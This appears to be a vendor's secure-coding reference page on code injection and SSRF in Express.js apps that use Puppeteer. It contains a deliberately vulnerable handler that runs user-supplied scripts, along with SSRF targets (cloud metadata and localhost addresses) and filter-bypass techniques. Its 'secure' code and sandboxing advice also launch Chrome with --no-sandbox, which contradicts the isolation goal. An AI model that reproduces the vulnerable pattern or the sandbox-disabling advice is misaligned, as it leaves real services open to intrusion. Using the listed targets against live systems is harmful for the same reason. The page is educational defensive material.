Express.js Puppeteer Code Injection

High Risk Code Injection
expresspuppeteercode-injectionjavascriptbrowser-automationssrf

What it is

The Express.js application uses Puppeteer for browser automation with user-controlled input, leading to code injection vulnerabilities. Attackers can inject malicious JavaScript code that gets executed in the browser context, potentially leading to data exfiltration, SSRF, or other security issues.

// Vulnerable: User input in page.evaluate()
const puppeteer = require('puppeteer');

app.post('/scrape', async (req, res) => {
  const url = req.body.url;
  const script = req.body.script;
  
  const browser = await puppeteer.launch();
  const page = await browser.newPage();
  
  await page.goto(url); // Dangerous: unvalidated URL
  
  // Dangerous: executing user-controlled script
  const result = await page.evaluate(script);
  
  await browser.close();
  res.json({ result });
});
// Secure: Input validation and sandboxing
const puppeteer = require('puppeteer');
const { URL } = require('url');

const ALLOWED_DOMAINS = ['example.com', 'safe-site.com'];
const SAFE_SCRIPTS = {
  'get-title': 'document.title',
  'get-url': 'window.location.href'
};

app.post('/scrape', async (req, res) => {
  const urlString = req.body.url;
  const scriptName = req.body.script;
  
  try {
    // Validate URL
    const url = new URL(urlString);
    if (!ALLOWED_DOMAINS.includes(url.hostname)) {
      return res.status(400).json({ error: 'Domain not allowed' });
    }
    
    // Use predefined safe scripts only
    const script = SAFE_SCRIPTS[scriptName];
    if (!script) {
      return res.status(400).json({ error: 'Script not allowed' });
    }
    
    const browser = await puppeteer.launch({ args: ['--no-sandbox'] });
    const page = await browser.newPage();
    
    await page.goto(url.toString());
    const result = await page.evaluate(script);
    
    await browser.close();
    res.json({ result });
  } catch (error) {
    res.status(400).json({ error: 'Invalid request' });
  }
});

💡 Why This Fix Works

The vulnerable code was updated to address the security issue.

Why it happens

Express applications pass user-controlled input directly to Puppeteer's page.evaluate() function which executes JavaScript in browser context: await page.evaluate(req.body.script) or page.addScriptTag({content: userCode}). Developers use page.evaluate() to inject dynamic behavior but don't realize it executes arbitrary JavaScript with access to page DOM, cookies, localStorage, and can make network requests. User input containing malicious JavaScript accesses sensitive data in rendered pages, exfiltrates information to attacker servers, or exploits browser vulnerabilities. page.evaluateHandle() and page.addScriptTag() provide similar code execution vectors when used with untrusted input.

Root causes

User Input Directly Passed to page.evaluate() or page.addScriptTag()

Express applications pass user-controlled input directly to Puppeteer's page.evaluate() function which executes JavaScript in browser context: await page.evaluate(req.body.script) or page.addScriptTag({content: userCode}). Developers use page.evaluate() to inject dynamic behavior but don't realize it executes arbitrary JavaScript with access to page DOM, cookies, localStorage, and can make network requests. User input containing malicious JavaScript accesses sensitive data in rendered pages, exfiltrates information to attacker servers, or exploits browser vulnerabilities. page.evaluateHandle() and page.addScriptTag() provide similar code execution vectors when used with untrusted input.

User-Controlled URLs in page.goto() Without Validation

Applications use user-provided URLs in Puppeteer navigation without proper validation: await page.goto(req.query.url). Attackers provide URLs to internal services (http://localhost:6379/), cloud metadata endpoints (http://169.254.169.254/), or malicious sites designed to exploit Puppeteer-controlled browsers. Lack of URL validation enables SSRF attacks through headless browser, accessing resources protected by network firewalls. User-supplied URLs with javascript: scheme execute code in browser context. file:// URLs access local filesystem. data: URLs with embedded scripts execute in page context enabling XSS-like attacks against browser automation.

Insufficient JavaScript Code Sanitization for Browser Execution

Applications attempt to sanitize user input for page.evaluate() but use incomplete or bypassable filters. Code checks for dangerous keywords like 'fetch', 'XMLHttpRequest', 'eval' but attackers bypass using bracket notation, Unicode escapes, or alternative APIs (navigator.sendBeacon, window.open). String-based sanitization fails to parse JavaScript syntax correctly allowing injection through comments, template literals, or regex literals. Applications sanitize obvious attack patterns but miss DOM manipulation (document.createElement('script')), indirect code execution (setTimeout with string), or Puppeteer-specific APIs accessible in browser context.

Dynamic Puppeteer Script Generation with User Input

Applications generate Puppeteer automation scripts by concatenating user input into JavaScript code: const script = `await page.goto('${userUrl}'); await page.screenshot();`. User input breaks out of string context using quotes, template literal syntax, or comment characters to inject arbitrary Puppeteer commands. Dynamic script generation enables attackers to manipulate browser behavior, inject additional page.evaluate() calls, modify screenshot parameters, or access Puppeteer CDP (Chrome DevTools Protocol) directly. Scripts generated with user content execute with same permissions as application, accessing filesystem, environment variables, and network resources.

Missing Validation of File Paths and Content for Browser Operations

Applications use user input to determine file paths for Puppeteer operations without validation. User-controlled paths in page.goto('file://' + userPath), page.setContent(fs.readFileSync(userFile)), or browser.createIncognitoBrowserContext({downloadsPath: userDir}) enable path traversal, arbitrary file read, or filesystem manipulation. Users specify HTML content loaded via page.setContent() containing malicious scripts without sanitization. Applications trust user-provided HTML as safe data format without recognizing it may contain JavaScript, iframes, or meta refresh redirects. File upload features render user-supplied HTML/SVG files in Puppeteer without content validation.

Fixes

1

Validate and Sanitize All User Input Before Puppeteer Operations

Never pass user input directly to page.evaluate(), page.addScriptTag(), or any Puppeteer method executing code. Validate URLs using URL class: const url = new URL(userInput); if (!['http:', 'https:'].includes(url.protocol)) reject. For page.evaluate(), use function parameters to pass data safely: page.evaluate((data) => {/* use data */}, sanitizedUserData) instead of string concatenation. Sanitize HTML content with DOMPurify before page.setContent(): const clean = DOMPurify.sanitize(userHtml, {SAFE_FOR_JQUERY: true}). Validate file paths using path.resolve() and checking they're within allowed directories. Implement type checking and schema validation on all user inputs before Puppeteer operations.

2

Implement Strict URL and Domain Allowlists

Create explicit allowlists of permitted domains and URL patterns for page.goto() navigation. Define allowed domains: const allowedDomains = ['example.com', 'trusted-cdn.net']; validate URL hostname matches allowlist before navigation. Use URL parser to extract and validate all components: protocol, hostname, port, path. Block dangerous URL schemes: reject javascript:, data:, file:, blob: URLs. For internal rendering, use indirect reference pattern where users select from predefined template IDs mapped to safe URLs server-side. Implement domain reputation checking or integrate with threat intelligence feeds to detect malicious domains. Log all blocked navigation attempts for security monitoring.

3

Never Generate Dynamic JavaScript with User Input

Eliminate all dynamic JavaScript code generation using user input. Never concatenate user data into code strings for page.evaluate(): delete code like page.evaluate(`const data = '${userInput}';`). Use page.evaluate() with function parameters passing data as arguments: await page.evaluate((safeData) => { /* code using safeData */ }, validatedInput). For conditional logic based on user input, use data-driven approaches: pass configuration objects and have client-side code make decisions based on data values, not execute user-provided code. Pre-define all JavaScript functions executed in browser context. Use allowlisted function dispatch pattern if behavior customization is required.

4

Implement Content Security Policy in Puppeteer Pages

Set strict Content Security Policy headers on pages rendered by Puppeteer to limit damage from injected scripts. Configure CSP via page.setExtraHTTPHeaders(): await page.setExtraHTTPHeaders({'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'"}). Use nonce-based CSP for legitimate scripts when needed. For untrusted HTML content, use strictest CSP: default-src 'none'; script-src 'none'. Disable JavaScript entirely when rendering untrusted content where JS isn't required: await page.setJavaScriptEnabled(false) before page.goto(). CSP provides defense-in-depth limiting what injected code can access even if input validation fails.

5

Use Sandboxed Browser Contexts for Untrusted Content

Create isolated browser contexts for processing untrusted user content with Puppeteer. Use incognito contexts to prevent cookie/storage access: const context = await browser.createIncognitoBrowserContext(); const page = await context.newPage(). Configure browser launch with security options: puppeteer.launch({args: ['--no-sandbox', '--disable-setuid-sandbox', '--disable-dev-shm-usage', '--disable-gpu'], headless: true}). Implement resource limits per context using page.setDefaultNavigationTimeout(30000) and page.setDefaultTimeout(30000). Run Puppeteer in Docker containers with minimal permissions and restricted network access. Close contexts immediately after use to prevent resource exhaustion: await context.close().

6

Validate File Paths and HTML Content Comprehensively

Implement strict validation for all file system operations and HTML content in Puppeteer. For file paths, use path.resolve() to get absolute path and verify it's within allowed directories: const resolved = path.resolve(userPath); if (!resolved.startsWith('/var/app/public/')) reject. Validate HTML content before page.setContent() using HTML validators and sanitizers. Remove dangerous HTML elements (script, iframe, object, embed) and event handlers (onclick, onerror) using allowlist-based HTML sanitization. For file uploads rendered in Puppeteer, validate file type, scan for malware, and render in isolated contexts. Never use user-controlled paths in page.goto('file://') navigation.

Detect This Vulnerability in Your Code

Sourcery automatically identifies express.js puppeteer code injection and many other security issues in your codebase.